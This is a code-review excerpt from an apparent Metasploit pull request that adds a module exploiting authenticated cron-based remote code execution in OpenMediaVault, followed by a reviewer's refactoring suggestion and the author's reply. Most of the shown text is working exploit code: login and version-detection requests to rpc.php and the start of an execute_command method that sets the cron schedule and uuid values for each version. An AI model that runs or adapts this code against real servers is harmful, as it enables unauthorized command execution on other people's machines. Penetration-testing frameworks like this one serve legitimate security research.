modules/exploits/multi/http/openmediavault_auth_cron_rce.rb

```diff
@@ -0,0 +1,279 @@
+    )
+  end
+
+  def user
+    datastore['USERNAME']
+  end
+
+  def pass
+    datastore['PASSWORD']
+  end
+
+  def rpc_success?(res)
+    res&.code == 200 && res.body.include?('"error":null')
+  end
+
+  def login(user, pass)
+    print_status("#{peer} - Authenticating with OpenMediaVault using credentials #{user}:#{pass}")
+    res = send_request_cgi({
+      'uri' => normalize_uri(target_uri.path, '/rpc.php'),
+      'method' => 'POST',
+      'keep_cookies' => true,
+      'ctype' => 'application/json',
+      'data' => {
+        service: 'Session',
+        method: 'login',
+        params: {
+          username: user,
+          password: pass
+        },
+        options: nil
+      }.to_json
+    })
+    res&.code == 200 && res.body.include?('"authenticated":true')
+  end
+
+  def check_version
+    print_status('Trying to detect if target is running a vulnerable version of OpenMediaVault.')
+    res = send_request_cgi({
+      'uri' => normalize_uri(target_uri.path, '/rpc.php'),
+      'method' => 'POST',
+      'keep_cookies' => true,
+      'ctype' => 'application/json',
+      'data' => {
+        service: 'System',
+        method: 'getInformation',
+        params: nil,
+        options: {
+          updatelastaccess: false
+        }
+      }.to_json
+    })
+    return nil unless rpc_success?(res)
+
+    # parse json response and get the version
+    res_json = res.get_json_document
+    unless res_json.blank?
+      # OpenMediaVault v4 has a different json format where index 1 has the version information
+      version = res_json.dig('response', 1, 'value')
+      version = res_json.dig('response', 'version') if version.nil?
+      return Rex::Version.new(version.split('(')[0].gsub(/[[:space:]]/, '')) unless version.nil?
+    end
+    nil
+  end
+
+  def apply_config_changes
+    # Apply OpenMediaVault configuration changes
+    send_request_cgi({
+      'uri' => normalize_uri(target_uri.path, '/rpc.php'),
+      'method' => 'POST',
+      'ctype' => 'application/json',
+      'keep_cookies' => true,
+      'data' => {
+        service: 'Config',
+        method: 'applyChangesBg',
+        params: {
+          modules: [],
+          force: false
+        },
+        options: nil
+      }.to_json
+    })
+  end
+
+  def execute_command(cmd, _opts = {})
+    # OpenMediaFault current release - v6.0.15-1 uses an array definition ['*']
+    # OpenMediaVault v3.0.16 - v6.0.14-1 uses a string definition '*'
+    # OpenMediaVault v1.0.0 - v3.0.15 uses a string definition '*' and uuid setting 'undefined'
+    # OpenMediaVault < 1.0.0 is not supported in this module. It will never reach here because the login will fail
+    # MSF module: exploit/multi/http/openmediavault_cmd_exec can be used to exploit these versions
+    schedule = '*'
+    schedule = ['*'] if @version_number >= Rex::Version.new('6.0.15-1')
+    uuid = 'fa4b1c66-ef79-11e5-87a0-0002b3a176b4'
+    uuid = 'undefined' if @version_number <= Rex::Version.new('3.0.15')
```

Comment:
```suggestion
    uuid = @version_number <= Rex::Version.new('3.0.15') ? 'undefined' : 'fa4b1c66-ef79-11e5-87a0-0002b3a176b4'
```

also, can the uuid be randomized?

Reply:
Nope. This `uuid` value is fixed in order to successfully add a cron entry.
See https://github.com/rapid7/metasploit-framework/pull/19298/commits/198f3f8d9bc37d04f89d9d190a39d2674f0a5384 for your other comments.